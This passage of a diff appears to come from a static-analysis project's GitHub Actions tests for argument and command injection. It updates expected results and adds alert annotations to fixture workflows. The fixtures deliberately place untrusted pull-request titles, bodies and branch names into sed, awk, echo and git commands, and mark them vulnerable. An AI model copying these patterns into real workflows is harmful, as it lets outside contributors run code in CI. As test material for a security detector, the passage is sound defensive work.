VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | 
@@ -20,16 +33,3 @@ nodes | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths -#select -| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). 
| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref index a2f6e1c12b9c..3475e69cd3ad 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-088/ArgumentInjectionCritical.ql +query: experimental/Security/CWE-088/ArgumentInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 12171d8c7f27..981e5b865494 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected 
@@ -1,3 +1,4 @@ +#select edges | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | @@ -20,4 +21,3 @@ nodes | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref index b96467552c5b..3aa94b52965a 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-088/ArgumentInjectionMedium.ql +query: experimental/Security/CWE-088/ArgumentInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml index ba7d3eec1af7..bed01ffea540 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml 
@@ -4,4 +4,4 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml index 510ad86cbfa9..f4a9d4574528 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml @@ -6,4 +6,4 @@ runs: - shell: bash env: FOO: ${{ secrets.FOO}} - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml index ba7d3eec1af7..6c63aa58afa5 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml @@ -4,4 +4,4 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index 53a2e0c87e27..75a02958a998 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml 
@@ -16,7 +16,7 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.issue.body }}' + run: echo '${{ github.event.issue.body }}' # $ Alert[actions/code-injection/critical] - name: Step id: step env: @@ -25,10 +25,10 @@ runs: run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT - id: step2 env: - FOO2: ${{ github.event.issue.body }} + FOO2: ${{ github.event.issue.body }} # $ Source[actions/code-injection/critical] shell: bash run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink id: sink shell: bash - run: echo "${{ inputs.taint }}" + run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml index 0048a4ca31e1..25b58d07466c 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml @@ -213,7 +213,7 @@ runs: run: | git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}" - git pull origin ${{ github.head_ref || github.ref }} + git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/critical] git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml index 8bffcdc4020e..0a37ade5da63 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml 
@@ -74,7 +74,7 @@ runs: # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli run: | packages="ultralytics-actions" - if [ "${{ inputs.spelling }}" = "true" ]; then + if [ "${{ inputs.spelling }}" = "true" ]; then # $ Alert[actions/code-injection/medium] packages="$packages codespell tomli" fi @@ -211,10 +211,10 @@ runs: - name: Commit and Push Changes if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' run: | - git config --global user.name "${{ inputs.github_username }}" - git config --global user.email "${{ inputs.github_email }}" + git config --global user.name "${{ inputs.github_username }}" # $ Alert[actions/code-injection/medium] + git config --global user.email "${{ inputs.github_email }}" # $ Alert[actions/code-injection/medium] # this action is not called in the test - git pull origin ${{ github.head_ref || github.ref }} + git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/medium] git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml index 398c0ee6a6e1..cd9dcaf1a0b0 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml @@ -19,7 +19,7 @@ runs: using: composite steps: - shell: bash - run: echo "${{ inputs.title }}" + run: echo "${{ inputs.title }}" # $ Alert[actions/code-injection/critical] - uses: frabert/replace-string-action@v2.5 id: out with: 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml index a8019fbbf145..85decb599321 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml @@ -93,7 +93,7 @@ runs: shell: bash - shell: bash run: | - echo "${{ inputs.body }}" + echo "${{ inputs.body }}" # $ Alert[actions/code-injection/critical] # Checkout Repository ---------------------------------------------------------------------------------------------- - name: Checkout Repository @@ -220,7 +220,7 @@ runs: run: | git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}" - git pull origin ${{ github.head_ref || github.ref }} + git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/critical] git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml index 7b9c57354882..301be58e2e80 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml @@ -14,7 +14,7 @@ jobs: - uses: actions/checkout@v2 - name: Remove conflicting chars env: - ISSUE_TITLE: ${{github.event.issue.title}} + ISSUE_TITLE: ${{github.event.issue.title}} # $ Source[actions/code-injection/critical] uses: frabert/replace-string-action@1.2 id: remove_quotations with: 
@@ -24,6 +24,6 @@ jobs: - name: Check info id: check-info run: | - echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV + echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml index 5cf7bbd4e6bd..c4add3b215ec 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml @@ -17,12 +17,12 @@ jobs: workflow: ${{ github.event.workflow_run.workflow_id }} name: pr - - name: save PR id + - name: save PR id # $ Source[actions/code-injection/critical] id: pr run: echo "::set-output name=id::$(> $GITHUB_OUTPUT - - run: echo ${{ steps.prepare.outputs.pr }} + - run: echo ${{ steps.prepare.outputs.pr }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml index 63acdc612b0e..2d1acd97b2dc 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml @@ -14,9 +14,9 